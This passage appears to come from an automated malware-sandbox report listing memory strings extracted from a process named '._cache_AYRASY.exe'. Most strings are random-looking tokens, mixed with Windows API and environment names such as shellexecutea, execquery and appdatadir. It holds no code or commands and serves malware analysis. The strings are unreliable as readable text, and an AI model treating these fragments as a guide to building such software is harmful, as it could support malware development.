                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6bl5zq8rmemstr_75db682d-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3on4iq4pmemstr_3f4e0d9b-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6tm6rb6vmemstr_e6625f62-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6gf6bl5zq8rmemstr_7b0496f0-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: loopq8ro}memstr_1f9a8002-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p4ap0ca0sr7eh}memstr_4176d0bd-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6tm6rb6vinee}memstr_bbc73176-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3on4iq4p{}memstr_ac13ff3b-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p4ap0ca0sr7eq}memstr_166654fb-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6gf6bl5zq8rj}memstr_1bcb1532-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3on4iq4pg}memstr_b5c86a53-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p4ap0ca0sr7e@}memstr_fc78fa68-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c9ug7dm1n]}memstr_69baa1f7-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0ca0sr7ev}memstr_1f1d5654-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6gf6bl5zq8rs}memstr_1b120154-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rror,}memstr_3a40019d-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n9ui1nl8h8v)}memstr_29e0bec1-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f0hm3bh8a"}memstr_fb1c0e7e-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f0hm3bh8amal?}memstr_aae9622c-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4xi4sa8omemstr_349150b5-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8yv4xn1vtememstr_420008a4-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2wmemstr_b814d83d-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mmemstr_f8653ef6-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n9ui1nl8h8vmemstr_8e08ba22-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8yv4xn1vmemstr_f74f5620-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hmemstr_11faae07-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c0ds9xx3uu8vmemstr_6b66f91f-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osversion8vmemstr_fc66af35-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8smemstr_ca94f8a0-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n9ui1nl8hmemstr_b5159dd3-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8yv4xn1vxpmemstr_d753631c-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sw_shownormalmemstr_cf826605-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a7mmemstr_f7f827ba-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f0hm3bh8amemstr_154327c8-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h2sc8smemstr_ea8b33fe-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z7nx8hm0hmemstr_b4809194-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: applicationmemstr_a5fd8836-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8yv4xn1vtememstr_7002bfe9-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentn|memstr_76c6acc6-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0wk|memstr_b307eb01-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hd|memstr_eeffb985-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecutea|memstr_44ffc8c9-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4xi4sa8oz|memstr_886fbb29-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n9ui1nl8h8vw|memstr_7bc6856b-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2wp|memstr_9d370c75-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findwindowswm|memstr_608b1760-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8sf|memstr_187a511f-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: extended\|memstr_db7741c0-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8sy|memstr_a7672255-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mr|memstr_9a78e62f-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4xi4sa8o/|memstr_9f0dd266-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c0ds9xx3uu8v%|memstr_256c4b26-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405091;|memstr_6f9425c5-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m4|memstr_72b9b063-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q6gh6lt1o1|memstr_efcbb203-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0w|memstr_671d167f-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0amemstr_64451754-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m3bi6fc9ay0xmemstr_df5363c6-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execquerymemstr_6969b5cd-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2eb9na0a7mmemstr_4f198b9a-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0wmemstr_adfb356e-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8smemstr_6e6942cc-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2eb9na0amemstr_8e18dfaf-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2eb9na0a0wmemstr_c91af37e-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: displaynamej{memstr_c9e6975a-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0wg{memstr_c4bc75b9-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w`{memstr_e636f695-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m3bi6fc9ay0x}{memstr_c5f8b195-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405091v{memstr_5ed7ff6b-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8ss{memstr_985a102e-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8sl{memstr_8c6c4277-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hb{memstr_bb3f4c0c-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w7m_{memstr_243b46f7-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a7mx{memstr_6a050ddf-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hu{memstr_ad9321d7-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h.{memstr_c1f04e98-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8pz6cx1de0w+{memstr_e03fc5e1-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h${memstr_fd60883f-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a7m!{memstr_bfda8da5-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w:{memstr_e2ba63a9-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m7{memstr_76eee908-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a5h0{memstr_a5212589-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: productstatememstr_835c804d-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6xh2sc8smemstr_ba0cbe98-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6cx1de0wmemstr_386ab926-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p9fw1cq6dmemstr_6801b0e4-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hmzmemstr_282d122f-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8sczmemstr_6e013d70-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: de0wrzmemstr_2b59ab7a-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mezmemstr_dc3c4a44-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v3fd5jh1al9x^zmemstr_7ceb5a47-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w[zmemstr_66b8d145-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8stzmemstr_01bd694f-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0aqzmemstr_429db2eb-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w*zmemstr_a20974c1-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: e8pz6cx1de0w'z
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0a6z
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w8gh6xj8m3z
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: l3cy5rl7mu9tz
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: userprofiledir
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: e0yu4to4m
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: m7ou4td9b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: z2nq4ft7qw0zz
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u7rh3pp5v5h
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n2xx6fr2h
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: iledir
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n9lb6kn0j
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: k4rs9cc4y
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u8eo4bx8x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u7rh3pp5v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v3fd5jh1al9x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: z2nq4ft7qw0z
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: f3sy9hf6f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: m2sg2zk4k
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8siy
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2wxy
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7muy
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5hny
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0a8sky
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mdy
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: 9tt7ou5hay
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0a8szy
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2wpy
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0a9t-y
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: appdatadir&y
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5h#y
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7m<y
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8s9y
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5h2y
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w7m
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: l3cy5rl7mu9t
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: o7eg9pv6em4a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q4ia2ok9ii4a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: t2ky9la2lleft
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: m8kg8my1k
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: 1884050258s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0aox
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: m8kg8my1khx
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: m8kg8my1kex
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: t4np7lz8iu9f~x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7m{x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0atx
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w7mqx
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q4ia2ok9ii4ajx
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: t9pb8qu1c8sgx
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: t9pb8qu1cleft@x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n8hz1cv2z]x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: m8kg8my1k4avx
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5hsx
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: z2nq4ft7qw0z)x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5h"x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7m?x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7m8x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u4tv9td1w0z5x
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u4tv9td1w0zt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u4tv9td1w
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v7xl4dd6i4sht
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w4s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: l5me8ge5i
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q0cx6ts5pi4s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q4th3hp0a0z
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8sht
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q9nf5wu2gh6w
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0a5h
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w8st
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q0cx6ts5pi4st
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q4th3hp0a8s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n2xx6fr2hnw
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mdw
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0aaw
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u4tv9td1wzw
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5hww
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2wpw
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: z2nq4ft7qw0zmw
